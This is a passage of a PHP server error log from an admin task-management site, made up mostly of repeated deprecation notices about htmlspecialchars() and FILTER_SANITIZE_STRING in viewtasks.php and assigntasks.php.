/home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:16:44 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:17:04 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 23 [21-Mar-2025 17:18:00 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:19:18 Australia/Sydney] PHP Deprecated: Constant FILTER_SANITIZE_STRING is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/assigntasks.php on line 27 [21-Mar-2025 17:19:43 Australia/Sydney] PHP Warning: Undefined array key "ongoing" in /home/emeraadmin/public_html/pages/emeraadmin/dashboard.php on line 26 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/emeraadmin/viewtasks.php on line 174 [21-Mar-2025 17:24:52 Australia/Sydney] PHP Deprecated: 